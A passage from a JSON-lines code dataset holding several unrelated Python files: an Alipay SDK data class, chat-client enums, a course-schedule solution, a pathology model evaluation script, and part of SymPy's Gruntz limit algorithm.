hparams[\"117M\"]\n\tTc = 128\n\tTg = 128\n\n\tselfattn_flop(B=B, H=H, K=K, Tc=Tc, Tg=Tg, cache_length=0)\n\tselfattn_flop(B=B, H=H, K=K, Tc=Tc, Tg=Tg, cache_length=64)\n\tselfattn_flop(B=B, H=H, K=K, Tc=Tc, Tg=Tg, cache_length=128)\n\n\n\n"} {"ext": "py", "sha": "1a2fe9c92a6d945dfd2ba4172ed35e87e3b9f918", "content": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass TradeFundBillDetail(object):\n\n def __init__(self):\n self._amount = None\n self._asset_type_code = None\n self._asset_user_id = None\n self._biz_pay_type = None\n self._create_time = None\n self._payment_no = None\n\n @property\n def amount(self):\n return self._amount\n\n @amount.setter\n def amount(self, value):\n self._amount = value\n @property\n def asset_type_code(self):\n return self._asset_type_code\n\n @asset_type_code.setter\n def asset_type_code(self, value):\n self._asset_type_code = value\n @property\n def asset_user_id(self):\n return self._asset_user_id\n\n @asset_user_id.setter\n def asset_user_id(self, value):\n self._asset_user_id = value\n @property\n def biz_pay_type(self):\n return self._biz_pay_type\n\n @biz_pay_type.setter\n def biz_pay_type(self, value):\n self._biz_pay_type = value\n @property\n def create_time(self):\n return self._create_time\n\n @create_time.setter\n def create_time(self, value):\n self._create_time = value\n @property\n def payment_no(self):\n return self._payment_no\n\n @payment_no.setter\n def payment_no(self, value):\n self._payment_no = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.amount:\n if hasattr(self.amount, 'to_alipay_dict'):\n params['amount'] = self.amount.to_alipay_dict()\n else:\n params['amount'] = self.amount\n if self.asset_type_code:\n if hasattr(self.asset_type_code, 'to_alipay_dict'):\n params['asset_type_code'] = self.asset_type_code.to_alipay_dict()\n else:\n params['asset_type_code'] = self.asset_type_code\n if self.asset_user_id:\n if hasattr(self.asset_user_id, 'to_alipay_dict'):\n params['asset_user_id'] = self.asset_user_id.to_alipay_dict()\n else:\n params['asset_user_id'] = self.asset_user_id\n if self.biz_pay_type:\n if hasattr(self.biz_pay_type, 'to_alipay_dict'):\n params['biz_pay_type'] = self.biz_pay_type.to_alipay_dict()\n else:\n params['biz_pay_type'] = self.biz_pay_type\n if self.create_time:\n if hasattr(self.create_time, 'to_alipay_dict'):\n params['create_time'] = self.create_time.to_alipay_dict()\n else:\n params['create_time'] = self.create_time\n if self.payment_no:\n if hasattr(self.payment_no, 'to_alipay_dict'):\n params['payment_no'] = self.payment_no.to_alipay_dict()\n else:\n params['payment_no'] = self.payment_no\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = TradeFundBillDetail()\n if 'amount' in d:\n o.amount = d['amount']\n if 'asset_type_code' in d:\n o.asset_type_code = d['asset_type_code']\n if 'asset_user_id' in d:\n o.asset_user_id = d['asset_user_id']\n if 'biz_pay_type' in d:\n o.biz_pay_type = d['biz_pay_type']\n if 'create_time' in d:\n o.create_time = d['create_time']\n if 'payment_no' in d:\n o.payment_no = d['payment_no']\n return o\n\n\n"} {"ext": "py", "sha": "1a2fea07750d6014226f0bc33440cd6ceaed26d9", "content": "from typing import TYPE_CHECKING\n\n# typing doesnt understand aenum so im pretending its stdlib enum while type checking\n\nif TYPE_CHECKING:\n import enum\nelse:\n import aenum as enum\n\n\n__all__ = (\n \"ChannelType\",\n \"PresenceType\",\n 
\"RelationshipType\",\n \"AssetType\",\n \"SortType\",\n)\n\nclass ChannelType(enum.Enum):\n saved_message = \"SavedMessage\"\n direct_message = \"DirectMessage\"\n group = \"Group\"\n text_channel = \"TextChannel\"\n voice_channel = \"VoiceChannel\"\n\nclass PresenceType(enum.Enum):\n busy = \"Busy\"\n idle = \"Idle\"\n invisible = \"Invisible\"\n online = \"Online\"\n\nclass RelationshipType(enum.Enum):\n blocked = \"Blocked\"\n blocked_other = \"BlockedOther\"\n friend = \"Friend\"\n incoming_friend_request = \"Incoming\"\n none = \"None\"\n outgoing_friend_request = \"Outgoing\"\n user = \"User\"\n\nclass AssetType(enum.Enum):\n image = \"Image\"\n video = \"Video\"\n text = \"Text\"\n audio = \"Audio\"\n file = \"File\"\n\nclass SortType(enum.Enum):\n latest = \"Latest\"\n oldest = \"Oldest\"\n relevance = \"Relevance\"\n"} {"ext": "py", "sha": "1a2fea9c884de04b9d8461dfabf1a0c9a9419dee", "content": "'''\nThere are a total of numCourses courses you have to take, labeled from 0 to numCourses-1.\n\nSome courses may have prerequisites, for example to take course 0 you have to first take course 1, which is expressed as a pair: [0,1]\n\nGiven the total number of courses and a list of prerequisite pairs, is it possible for you to finish all courses?\n\n**Example 1**\n\n`Input: numCourses = 2, prerequisites = [[1,0]]`\n`Output: true`\n\nExplanation: There are a total of 2 courses to take.\nTo take course 1 you should have finished course 0. So it is possible.\n\n**Example 2**\n`Input: numCourses = 2, prerequisites = [[1,0],[0,1]]`\n`Output: false`\n\nExplanation: There are a total of 2 courses to take.\nTo take course 1 you should have finished course 0, and to take course 0 you should\nalso have finished course 1. So it is impossible.\n\n**Note**\nYou may assume that there are no duplicate edges in the input prerequisites.\n'''\n\nfrom collections import defaultdict\n\n\nclass Solution(object):\n def __init__(self):\n self.eligibleCourses = []\n self.visited = []\n\n def seedEligibleCourses(self, g):\n for index, node in g.items():\n if len(node) == 0 and index not in self.visited:\n self.eligibleCourses.append(index)\n\n def dfs(self, node, g):\n if node in self.visited:\n return\n\n self.visited.append(node)\n for _, n in g.items():\n if node in n:\n n.remove(node)\n\n for successor in g[node]:\n if successor not in self.visited:\n self.eligibleCourses.append(successor)\n self.dfs(node, g)\n\n def canFinish(self, numCourses, prerequisites):\n if not prerequisites:\n return True\n\n graph = defaultdict(list)\n for relation in prerequisites:\n currentCourse, prerequisite = relation[0], relation[1]\n graph[prerequisite].append(currentCourse) # post order!!\n if currentCourse not in graph:\n graph[currentCourse] = []\n\n self.seedEligibleCourses(graph)\n while self.eligibleCourses:\n current = self.eligibleCourses.pop(0)\n self.dfs(current, graph)\n self.seedEligibleCourses(graph)\n\n for _, n in graph.items():\n if len(n) > 0:\n return False\n return True\n"} {"ext": "py", "sha": "1a2fead4cdba019420ee37f32acc4de5822c2905", "content": "\n#%% load the background\nfrom __future__ import print_function, division\nimport torch\nfrom torchvision import datasets, transforms\nimport os\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\nimport pandas as pd\nimport numpy as np\nimport torch.nn as nn\n\n#%% define the datasets\nlist_datasets = ['/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/original',\n 
'/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_HE',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_tumorLymphnode_165',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_onlyH',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/original',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/normalized_to_HE_165',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/normalized_to_camelyon_165',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/tumorLymphnode/patches/size_165/normalized_to_onlyH_165'\n ]\nlist_dataset_names = ['camelyon_ori', 'camelyon_to_HE', 'camelyon_to_tL', 'camelyon_to_H',\n 'tumorLymphnode_ori', 'tumorLymphnode_to_HE', 'tumorLymphnode_to_ca', 'tumorLymphnode_to_H']\n\nlist_models = ['/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/original/model_ResNet152.pt',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_HE/model_ResNet152.pt',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_tumorLymphnode_165/model_ResNet152.pt',\n '/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/patchCamelyon/patches/normalized_to_onlyH/model_ResNet152.pt' ]\n\nlist_model_names = ['ResNet_original', \"ResNet_normalized_to_HE\", \"ResNet_normalized_to_tumorLymphnode\", \"ResNet_normalized_to_H\"]\n\n#%% iterate over all datasets (and later over all models)\nlist_model = []\nlist_dataset = []\nlist_kappa = []\nlist_accuracy = []\nlist_loss = []\n\nfor idataset, tdataset in enumerate(list_datasets):\n #print(idataset)\n\n #%% define the folder\n if tdataset.find(\"patches\") > 0:\n dataset2use = \"val\"\n else:\n dataset2use = 'test'\n\n # %%define the function to get the data\n def get_datatransform(inputSize, data_dir):\n\n data_transforms = {\n dataset2use: transforms.Compose([\n transforms.Resize([inputSize, inputSize]),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n }\n\n image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x),\n data_transforms[x])\n for x in [dataset2use]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4,\n shuffle=False, num_workers=4)\n for x in [dataset2use]}\n\n return(data_transforms, image_datasets, dataloaders)\n\n #%% prepare the transformations and the dataset\n data_transforms , image_datasets, dataloaders= get_datatransform(259, tdataset)\n\n class_names = dataloaders[dataset2use].dataset.classes\n nb_classes = len(class_names)\n confusion_matrix = torch.zeros(nb_classes, nb_classes)\n\n #%% visualize the input data (to look if evey class is evenly)\n class_names = ['normal', 'tumor']\n\n df = pd.DataFrame(dataloaders[dataset2use].dataset.samples)\n df.columns = ['file', 'class_nr']\n\n df.class_nr = np.array(df.class_nr)\n\n class_labels = ['NaN' for x in range(df.shape[0])]\n for i in range(0,df.shape[0]):\n class_labels[i] = class_names[df.class_nr[int(i)]]\n df = df.assign(class_labels = class_labels)\n sns.set_palette(\"Set1\", n_colors = 12)\n sns.countplot(df.class_labels)\n plt.xlabel('Pattern')\n plt.ylabel('Count [n]')\n plt.savefig('DataBase_' + dataset2use + '.jpg')\n plt.show()\n plt.close()\n\n n_normal = 
sum(map(lambda x : x == \"normal\", class_labels))\n n_tumor = sum(map(lambda x: x == \"tumor\", class_labels))\n print(\"n = \" + str(n_normal) + \" tiles without and n = \" + str(n_tumor) + \" tiles with tumor.\")\n\n #%% iterate over the models\n from sklearn.metrics import cohen_kappa_score\n from sklearn.metrics import accuracy_score\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n n = 0\n df_values = pd.DataFrame(list(range(0,len(dataloaders[dataset2use].sampler.data_source.imgs))))\n\n for imodel, tmodel in enumerate(list_models):\n print(imodel)\n\n #%% prepare the dataset\n inputSize = 224\n data_transforms, image_datasets, dataloaders = get_datatransform(inputSize, tdataset)\n\n #%% apply model on test data set (and get a confusion matrix)\n model_ft = torch.load(tmodel)\n model_ft.eval()\n vector_prd = []\n vector_exp = []\n\n with torch.no_grad():\n for i, (inputs, classes) in enumerate(dataloaders[dataset2use]):\n inputs = inputs.to(device)\n classes = classes.to(device)\n outputs = model_ft(inputs)\n _, preds = torch.max(outputs, 1)\n\n if i == 0:\n outputs_matrix = outputs\n else:\n outputs_matrix = torch.cat((outputs_matrix, outputs), 0)\n\n vector_prd = vector_prd + preds.view(-1).cpu().tolist()\n vector_exp = vector_exp + classes.view(-1).cpu().tolist()\n\n confusion_matrix = torch.zeros(nb_classes, nb_classes)\n for x, y in zip(vector_exp, vector_prd):\n confusion_matrix[y, x] += 1\n\n loss_function = nn.CrossEntropyLoss()\n loss_value = loss_function(outputs_matrix.to('cpu'), torch.tensor(vector_exp))\n print(confusion_matrix)\n\n #%% calcualte the comparison values\n list_model.append(list_model_names[imodel])\n list_dataset.append(list_dataset_names[idataset])\n list_kappa.append(cohen_kappa_score(vector_prd, vector_exp))\n list_accuracy.append(accuracy_score(vector_prd, vector_exp))\n list_loss.append(loss_value.tolist())\n print('Kappa-value: ' + str(list_kappa[-1]))\n print('Accurary-value: ' + str(list_accuracy[-1]))\n\n #%% plot a confusion matrix\n matrix2plot = confusion_matrix.numpy()\n matrix2plot = matrix2plot.astype(int)\n\n ax = sns.heatmap(matrix2plot,\n annot = True, linewidths=5, annot_kws={\"size\": 10},\n xticklabels=class_names, yticklabels=class_names,\n cmap = \"Blues\")\n plt.xlabel('Ground Truth')\n plt.ylabel('Model ' + list_model[-1] + \" on \" + list_dataset[-1])\n plt.savefig('ConfMat_' +'Model ' + list_model[-1] + \" on \" + list_dataset[-1] + '.jpg')\n plt.show()\n plt.close()\n\n#%% make a dataframe\ndf = pd.DataFrame(list(zip(list_model, list_dataset, list_kappa)), columns=['model', 'data', 'kappa'])\ndf = df.pivot_table(index = [\"model\"], columns = [\"data\"], values = \"kappa\")\ndf.to_csv('/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/table.csv')\ndf.to_excel('/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/table.xlsx')\nwith open('/home/cw9/sds_hd/sd18a006/marlen/datasets/stainNormalization/table.tex', 'w') as tf:\n tf.write(df.to_latex())"} {"ext": "py", "sha": "1a2feae71d87f1c61be44ff563c96ea2e1ff4ca0", "content": "def is_element(element):\n\n pass\n\n"} {"ext": "py", "sha": "1a2feb1d38513c2e04722f0abbb4308498ded0bc", "content": "\"\"\"\nLimits\n======\n\nImplemented according to the PhD thesis\nhttp://www.cybertester.com/data/gruntz.pdf, which contains very thorough\ndescriptions of the algorithm including many examples. We summarize here\nthe gist of it.\n\nAll functions are sorted according to how rapidly varying they are at\ninfinity using the following rules. 
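(For instance, exp(x) eventually dominates every fixed power of x, while log(x)
is dominated by every fixed power of x; the quantity L defined next makes this
comparison precise.)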
Any two functions f and g can be\ncompared using the properties of L:\n\nL=lim log|f(x)| / log|g(x)| (for x -> oo)\n\nWe define >, < ~ according to::\n\n 1. f > g .... L=+-oo\n\n we say that:\n - f is greater than any power of g\n - f is more rapidly varying than g\n - f goes to infinity/zero faster than g\n\n 2. f < g .... L=0\n\n we say that:\n - f is lower than any power of g\n\n 3. f ~ g .... L!=0, +-oo\n\n we say that:\n - both f and g are bounded from above and below by suitable integral\n powers of the other\n\nExamples\n========\n::\n 2 < x < exp(x) < exp(x**2) < exp(exp(x))\n 2 ~ 3 ~ -5\n x ~ x**2 ~ x**3 ~ 1/x ~ x**m ~ -x\n exp(x) ~ exp(-x) ~ exp(2x) ~ exp(x)**2 ~ exp(x+exp(-x))\n f ~ 1/f\n\nSo we can divide all the functions into comparability classes (x and x^2\nbelong to one class, exp(x) and exp(-x) belong to some other class). In\nprinciple, we could compare any two functions, but in our algorithm, we\ndo not compare anything below the class 2~3~-5 (for example log(x) is\nbelow this), so we set 2~3~-5 as the lowest comparability class.\n\nGiven the function f, we find the list of most rapidly varying (mrv set)\nsubexpressions of it. This list belongs to the same comparability class.\nLet's say it is {exp(x), exp(2x)}. Using the rule f ~ 1/f we find an\nelement \"w\" (either from the list or a new one) from the same\ncomparability class which goes to zero at infinity. In our example we\nset w=exp(-x) (but we could also set w=exp(-2x) or w=exp(-3x) ...). We\nrewrite the mrv set using w, in our case {1/w, 1/w^2}, and substitute it\ninto f. Then we expand f into a series in w::\n\n f = c0*w^e0 + c1*w^e1 + ... + O(w^en), where e0oo, lim f = lim c0*w^e0, because all the other terms go to zero,\nbecause w goes to zero faster than the ci and ei. So::\n\n for e0>0, lim f = 0\n for e0<0, lim f = +-oo (the sign depends on the sign of c0)\n for e0=0, lim f = lim c0\n\nWe need to recursively compute limits at several places of the algorithm, but\nas is shown in the PhD thesis, it always finishes.\n\nImportant functions from the implementation:\n\ncompare(a, b, x) compares \"a\" and \"b\" by computing the limit L.\nmrv(e, x) returns list of most rapidly varying (mrv) subexpressions of \"e\"\nrewrite(e, Omega, x, wsym) rewrites \"e\" in terms of w\nleadterm(f, x) returns the lowest power term in the series of f\nmrv_leadterm(e, x) returns the lead term (c0, e0) for e\nlimitinf(e, x) computes lim e (for x->oo)\nlimit(e, z, z0) computes any limit by converting it to the case x->oo\n\nAll the functions are really simple and straightforward except\nrewrite(), which is the most difficult/complex part of the algorithm.\nWhen the algorithm fails, the bugs are usually in the series expansion\n(i.e. in SymPy) or in rewrite.\n\nThis code is almost exact rewrite of the Maple code inside the Gruntz\nthesis.\n\nDebugging\n---------\n\nBecause the gruntz algorithm is highly recursive, it's difficult to\nfigure out what went wrong inside a debugger. Instead, turn on nice\ndebug prints by defining the environment variable SYMPY_DEBUG. 
For\nexample:\n\n[user@localhost]: SYMPY_DEBUG=True ./bin/isympy\n\nIn [1]: limit(sin(x)/x, x, 0)\nlimitinf(_x*sin(1/_x), _x) = 1\n+-mrv_leadterm(_x*sin(1/_x), _x) = (1, 0)\n| +-mrv(_x*sin(1/_x), _x) = set([_x])\n| | +-mrv(_x, _x) = set([_x])\n| | +-mrv(sin(1/_x), _x) = set([_x])\n| | +-mrv(1/_x, _x) = set([_x])\n| | +-mrv(_x, _x) = set([_x])\n| +-mrv_leadterm(exp(_x)*sin(exp(-_x)), _x, set([exp(_x)])) = (1, 0)\n| +-rewrite(exp(_x)*sin(exp(-_x)), set([exp(_x)]), _x, _w) = (1/_w*sin(_w), -_x)\n| +-sign(_x, _x) = 1\n| +-mrv_leadterm(1, _x) = (1, 0)\n+-sign(0, _x) = 0\n+-limitinf(1, _x) = 1\n\nAnd check manually which line is wrong. Then go to the source code and\ndebug this function to figure out the exact problem.\n\n\"\"\"\nfrom functools import reduce\n\nfrom sympy.core import Basic, S, Mul, PoleError\nfrom sympy.core.cache import cacheit\nfrom sympy.core.numbers import ilcm, I, oo\nfrom sympy.core.symbol import Dummy, Wild\nfrom sympy.core.traversal import bottom_up\n\nfrom sympy.functions import log, exp, sign as _sign\nfrom sympy.series.order import Order\nfrom sympy.simplify import logcombine\nfrom sympy.simplify.powsimp import powsimp, powdenest\n\nfrom sympy.utilities.misc import debug_decorator as debug\nfrom sympy.utilities.timeutils import timethis\n\ntimeit = timethis('gruntz')\n\n\ndef compare(a, b, x):\n \"\"\"Returns \"<\" if a\" for a>b\"\"\"\n # log(exp(...)) must always be simplified here for termination\n la, lb = log(a), log(b)\n if isinstance(a, Basic) and (isinstance(a, exp) or (a.is_Pow and a.base == S.Exp1)):\n la = a.exp\n if isinstance(b, Basic) and (isinstance(b, exp) or (b.is_Pow and b.base == S.Exp1)):\n lb = b.exp\n\n c = limitinf(la/lb, x)\n if c == 0:\n return \"<\"\n elif c.is_infinite:\n return \">\"\n else:\n return \"=\"\n\n\nclass SubsSet(dict):\n \"\"\"\n Stores (expr, dummy) pairs, and how to rewrite expr-s.\n\n Explanation\n ===========\n\n The gruntz algorithm needs to rewrite certain expressions in term of a new\n variable w. We cannot use subs, because it is just too smart for us. For\n example::\n\n > Omega=[exp(exp(_p - exp(-_p))/(1 - 1/_p)), exp(exp(_p))]\n > O2=[exp(-exp(_p) + exp(-exp(-_p))*exp(_p)/(1 - 1/_p))/_w, 1/_w]\n > e = exp(exp(_p - exp(-_p))/(1 - 1/_p)) - exp(exp(_p))\n > e.subs(Omega[0],O2[0]).subs(Omega[1],O2[1])\n -1/w + exp(exp(p)*exp(-exp(-p))/(1 - 1/p))\n\n is really not what we want!\n\n So we do it the hard way and keep track of all the things we potentially\n want to substitute by dummy variables. Consider the expression::\n\n exp(x - exp(-x)) + exp(x) + x.\n\n The mrv set is {exp(x), exp(-x), exp(x - exp(-x))}.\n We introduce corresponding dummy variables d1, d2, d3 and rewrite::\n\n d3 + d1 + x.\n\n This class first of all keeps track of the mapping expr->variable, i.e.\n will at this stage be a dictionary::\n\n {exp(x): d1, exp(-x): d2, exp(x - exp(-x)): d3}.\n\n [It turns out to be more convenient this way round.]\n But sometimes expressions in the mrv set have other expressions from the\n mrv set as subexpressions, and we need to keep track of that as well. In\n this case, d3 is really exp(x - d2), so rewrites at this stage is::\n\n {d3: exp(x-d2)}.\n\n The function rewrite uses all this information to correctly rewrite our\n expression in terms of w. In this case w can be chosen to be exp(-x),\n i.e. d2. 
The correct rewriting then is::\n\n exp(-w)/w + 1/w + x.\n \"\"\"\n def __init__(self):\n self.rewrites = {}\n\n def __repr__(self):\n return super().__repr__() + ', ' + self.rewrites.__repr__()\n\n def __getitem__(self, key):\n if not key in self:\n self[key] = Dummy()\n return dict.__getitem__(self, key)\n\n def do_subs(self, e):\n \"\"\"Substitute the variables with expressions\"\"\"\n for expr, var in self.items():\n e = e.xreplace({var: expr})\n return e\n\n def meets(self, s2):\n \"\"\"Tell whether or not self and s2 have non-empty intersection\"\"\"\n return set(self.keys()).intersection(list(s2.keys())) != set()\n\n def union(self, s2, exps=None):\n \"\"\"Compute the union of self and s2, adjusting exps\"\"\"\n res = self.copy()\n tr = {}\n for expr, var in s2.items():\n if expr in self:\n if exps:\n exps = exps.xreplace({var: res[expr]})\n tr[var] = res[expr]\n else:\n res[expr] = var\n for var, rewr in s2.rewrites.items():\n res.rewrites[var] = rewr.xreplace(tr)\n return res, exps\n\n def copy(self):\n \"\"\"Create a shallow copy of SubsSet\"\"\"\n r = SubsSet()\n r.rewrites = self.rewrites.copy()\n for expr, var in self.items():\n r[expr] = var\n return r\n\n\n@debug\ndef mrv(e, x):\n \"\"\"Returns a SubsSet of most rapidly varying (mrv) subexpressions of 'e',\n and e rewritten in terms of these\"\"\"\n e = powsimp(e, deep=True, combine='exp')\n if not isinstance(e, Basic):\n raise TypeError(\"e should be an instance of Basic\")\n if not e.has(x):\n return SubsSet(), e\n elif e == x:\n s = SubsSet()\n return s, s[x]\n elif e.is_Mul or e.is_Add:\n i, d = e.as_independent(x) # throw away x-independent terms\n if d.func != e.func:\n s, expr = mrv(d, x)\n return s, e.func(i, expr)\n a, b = d.as_two_terms()\n s1, e1 = mrv(a, x)\n s2, e2 = mrv(b, x)\n return mrv_max1(s1, s2, e.func(i, e1, e2), x)\n elif e.is_Pow and e.base != S.Exp1:\n e1 = S.One\n while e.is_Pow:\n b1 = e.base\n e1 *= e.exp\n e = b1\n if b1 == 1:\n return SubsSet(), b1\n if e1.has(x):\n base_lim = limitinf(b1, x)\n if base_lim is S.One:\n return mrv(exp(e1 * (b1 - 1)), x)\n return mrv(exp(e1 * log(b1)), x)\n else:\n s, expr = mrv(b1, x)\n return s, expr**e1\n elif isinstance(e, log):\n s, expr = mrv(e.args[0], x)\n return s, log(expr)\n elif isinstance(e, exp) or (e.is_Pow and e.base == S.Exp1):\n # We know from the theory of this algorithm that exp(log(...)) may always\n # be simplified here, and doing so is vital for termination.\n if isinstance(e.exp, log):\n return mrv(e.exp.args[0], x)\n # if a product has an infinite factor the result will be\n # infinite if there is no zero, otherwise NaN; here, we\n # consider the result infinite if any factor is infinite\n li = limitinf(e.exp, x)\n if any(_.is_infinite for _ in Mul.make_args(li)):\n s1 = SubsSet()\n e1 = s1[e]\n s2, e2 = mrv(e.exp, x)\n su = s1.union(s2)[0]\n su.rewrites[e1] = exp(e2)\n return mrv_max3(s1, e1, s2, exp(e2), su, e1, x)\n else:\n s, expr = mrv(e.exp, x)\n return s, exp(expr)\n elif e.is_Function:\n l = [mrv(a, x) for a in e.args]\n l2 = [s for (s, _) in l if s != SubsSet()]\n if len(l2) != 1:\n # e.g. 
something like BesselJ(x, x)\n raise NotImplementedError(\"MRV set computation for functions in\"\n \" several variables not implemented.\")\n s, ss = l2[0], SubsSet()\n args = [ss.do_subs(x[1]) for x in l]\n return s, e.func(*args)\n elif e.is_Derivative:\n raise NotImplementedError(\"MRV set computation for derviatives\"\n \" not implemented yet.\")\n raise NotImplementedError(\n \"Don't know how to calculate the mrv of '%s'\" % e)\n\n\ndef mrv_max3(f, expsf, g, expsg, union, expsboth, x):\n \"\"\"\n Computes the maximum of two sets of expressions f and g, which\n are in the same comparability class, i.e. max() compares (two elements of)\n f and g and returns either (f, expsf) [if f is larger], (g, expsg)\n [if g is larger] or (union, expsboth) [if f, g are of the same class].\n \"\"\"\n if not isinstance(f, SubsSet):\n raise TypeError(\"f should be an instance of SubsSet\")\n if not isinstance(g, SubsSet):\n raise TypeError(\"g should be an instance of SubsSet\")\n if f == SubsSet():\n return g, expsg\n elif g == SubsSet():\n return f, expsf\n elif f.meets(g):\n return union, expsboth\n\n c = compare(list(f.keys())[0], list(g.keys())[0], x)\n if c == \">\":\n return f, expsf\n elif c == \"<\":\n return g, expsg\n else:\n if c != \"=\":\n raise ValueError(\"c should be =\")\n return union, expsboth\n\n\ndef mrv_max1(f, g, exps, x):\n \"\"\"Computes the maximum of two sets of expressions f and g, which\n are in the same comparability class, i.e. mrv_max1() compares (two elements of)\n f and g and returns the set, which is in the higher comparability class\n of the union of both, if they have the same order of variation.\n Also returns exps, with the appropriate substitutions made.\n \"\"\"\n u, b = f.union(g, exps)\n return mrv_max3(f, g.do_subs(exps), g, f.do_subs(exps),\n u, b, x)\n\n\n@debug\n@cacheit\n@timeit\ndef sign(e, x):\n \"\"\"\n Returns a sign of an expression e(x) for x->oo.\n\n ::\n\n e > 0 for x sufficiently large ... 1\n e == 0 for x sufficiently large ... 0\n e < 0 for x sufficiently large ... -1\n\n The result of this function is currently undefined if e changes sign\n arbitrarily often for arbitrarily large x (e.g. sin(x)).\n\n Note that this returns zero only if e is *constantly* zero\n for x sufficiently large. [If e is constant, of course, this is just\n the same thing as the sign of e.]\n \"\"\"\n if not isinstance(e, Basic):\n raise TypeError(\"e should be an instance of Basic\")\n\n if e.is_positive:\n return 1\n elif e.is_negative:\n return -1\n elif e.is_zero:\n return 0\n\n elif not e.has(x):\n e = logcombine(e)\n return _sign(e)\n elif e == x:\n return 1\n elif e.is_Mul:\n a, b = e.as_two_terms()\n sa = sign(a, x)\n if not sa:\n return 0\n return sa * sign(b, x)\n elif isinstance(e, exp):\n return 1\n elif e.is_Pow:\n if e.base == S.Exp1:\n return 1\n s = sign(e.base, x)\n if s == 1:\n return 1\n if e.exp.is_Integer:\n return s**e.exp\n elif isinstance(e, log):\n return sign(e.args[0] - 1, x)\n\n # if all else fails, do it the hard way\n c0, e0 = mrv_leadterm(e, x)\n return sign(c0, x)\n\n\n@debug\n@timeit\n@cacheit\ndef limitinf(e, x, leadsimp=False):\n \"\"\"Limit e(x) for x-> oo.\n\n Explanation\n ===========\n\n If ``leadsimp`` is True, an attempt is made to simplify the leading\n term of the series expansion of ``e``. 
That may succeed even if\n ``e`` cannot be simplified.\n \"\"\"\n # rewrite e in terms of tractable functions only\n\n if not e.has(x):\n return e # e is a constant\n if e.has(Order):\n e = e.expand().removeO()\n if not x.is_positive or x.is_integer:\n # We make sure that x.is_positive is True and x.is_integer is None\n # so we get all the correct mathematical behavior from the expression.\n # We need a fresh variable.\n p = Dummy('p', positive=True)\n e = e.subs(x, p)\n x = p\n e = e.rewrite('tractable', deep=True, limitvar=x)\n e = powdenest(e)\n c0, e0 = mrv_leadterm(e, x)\n sig = sign(e0, x)\n if sig == 1:\n return S.Zero # e0>0: lim f = 0\n elif sig == -1: # e0<0: lim f = +-oo (the sign depends on the sign of c0)\n if c0.match(I*Wild(\"a\", exclude=[I])):\n return c0*oo\n s = sign(c0, x)\n # the leading term shouldn't be 0:\n if s == 0:\n raise ValueError(\"Leading term should not be 0\")\n return s*oo\n elif sig == 0:\n if leadsimp:\n c0 = c0.simplify()\n return limitinf(c0, x, leadsimp) # e0=0: lim f = lim c0\n else:\n raise ValueError(\"{} could not be evaluated\".format(sig))\n\n\ndef moveup2(s, x):\n r = SubsSet()\n for expr, var in s.items():\n r[expr.xreplace({x: exp(x)})] = var\n for var, expr in s.rewrites.items():\n r.rewrites[var] = s.rewrites[var].xreplace({x: exp(x)})\n return r\n\n\ndef moveup(l, x):\n return [e.xreplace({x: exp(x)}) for e in l]\n\n\n@debug\n@timeit\ndef calculate_series(e, x, logx=None):\n \"\"\" Calculates at least one term of the series of ``e`` in ``x``.\n\n This is a place that fails most often, so it is in its own function.\n \"\"\"\n from sympy.polys import cancel\n\n for t in e.lseries(x, logx=logx):\n # bottom_up function is required for a specific case - when e is\n # -exp(p/(p + 1)) + exp(-p**2/(p + 1) + p). No current simplification\n # methods reduce this to 0 while not expanding polynomials.\n t = bottom_up(t, lambda w: getattr(w, 'normal', lambda: w)())\n t = cancel(t, expand=False).factor()\n\n if t.has(exp) and t.has(log):\n t = powdenest(t)\n\n if not t.is_zero:\n break\n\n return t\n\n\n@debug\n@timeit\n@cacheit\ndef mrv_leadterm(e, x):\n \"\"\"Returns (c0, e0) for e.\"\"\"\n Omega = SubsSet()\n if not e.has(x):\n return (e, S.Zero)\n if Omega == SubsSet():\n Omega, exps = mrv(e, x)\n if not Omega:\n # e really does not depend on x after simplification\n return exps, S.Zero\n if x in Omega:\n # move the whole omega up (exponentiate each term):\n Omega_up = moveup2(Omega, x)\n exps_up = moveup([exps], x)[0]\n # NOTE: there is no need to move this down!\n Omega = Omega_up\n exps = exps_up\n #\n # The positive dummy, w, is used here so log(w*2) etc. will expand;\n # a unique dummy is needed in this algorithm\n #\n # For limits of complex functions, the algorithm would have to be\n # improved, or just find limits of Re and Im components separately.\n #\n w = Dummy(\"w\", real=True, positive=True)\n f, logw = rewrite(exps, Omega, x, w)\n series = calculate_series(f, w, logx=logw)\n try:\n lt = series.leadterm(w, logx=logw)\n except (ValueError, PoleError):\n lt = f.as_coeff_exponent(w)\n # as_coeff_exponent won't always split in required form. It may simply\n # return (f, 0) when a better form may be obtained. 
